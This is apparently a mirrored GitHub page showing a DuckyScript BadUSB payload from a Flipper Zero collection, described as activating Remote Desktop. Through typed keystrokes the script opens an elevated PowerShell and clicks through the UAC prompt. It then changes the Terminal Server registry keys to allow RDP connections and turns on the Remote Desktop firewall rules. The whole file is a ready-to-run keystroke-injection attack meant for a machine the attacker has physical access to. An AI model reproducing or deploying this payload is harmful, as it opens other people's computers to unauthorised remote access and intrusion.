mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-08 14:50:11 +00:00
22 lines
745 B
Plaintext
22 lines
745 B
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Activates Remote Desktop.
|
|
REM Version: 1.0
|
|
REM Category: Execution
|
|
DELAY 750
|
|
WINDOWS d
|
|
DELAY 1500
|
|
WINDOWS r
|
|
DELAY 1500
|
|
STRING powershell Start-Process powershell -Verb runAs
|
|
ENTER
|
|
DELAY 750
|
|
LEFTARROW
|
|
ENTER
|
|
DELAY 1200
|
|
ALT y
|
|
DELAY 1200
|
|
GUI UP
|
|
DELAY 1200
|
|
STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0;Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1;netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes;netsh advfirewall firewall set rule group='remote desktop' new enable=Yes; exit
|
|
ENTER
|